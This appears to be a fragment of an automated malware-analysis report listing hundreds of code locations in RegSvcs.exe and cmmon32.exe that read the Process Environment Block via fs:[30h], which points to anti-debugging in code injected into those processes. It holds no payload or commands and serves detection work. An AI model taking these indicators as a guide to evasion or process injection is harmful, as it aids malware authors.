            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F461A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F969A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F42990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F4A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F3C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F1B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F1C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F3B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F4513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F34120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F34120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F19100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F42AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F42ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F4FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F4D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F5927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FCB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FE8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FDEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F19240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F54A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F15210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F15210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F1AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FDAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F33A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F28A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F3DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F953CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F953CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FCD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F21B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F21B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F43B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F43B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FC8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F96DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F435A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F12D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F37D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F53D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F93540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F23D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F44D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F276E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F416E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F58EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F436CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FCFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F946A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F27E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FDAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FCFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F48E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F537F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F28794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F14F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F14F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
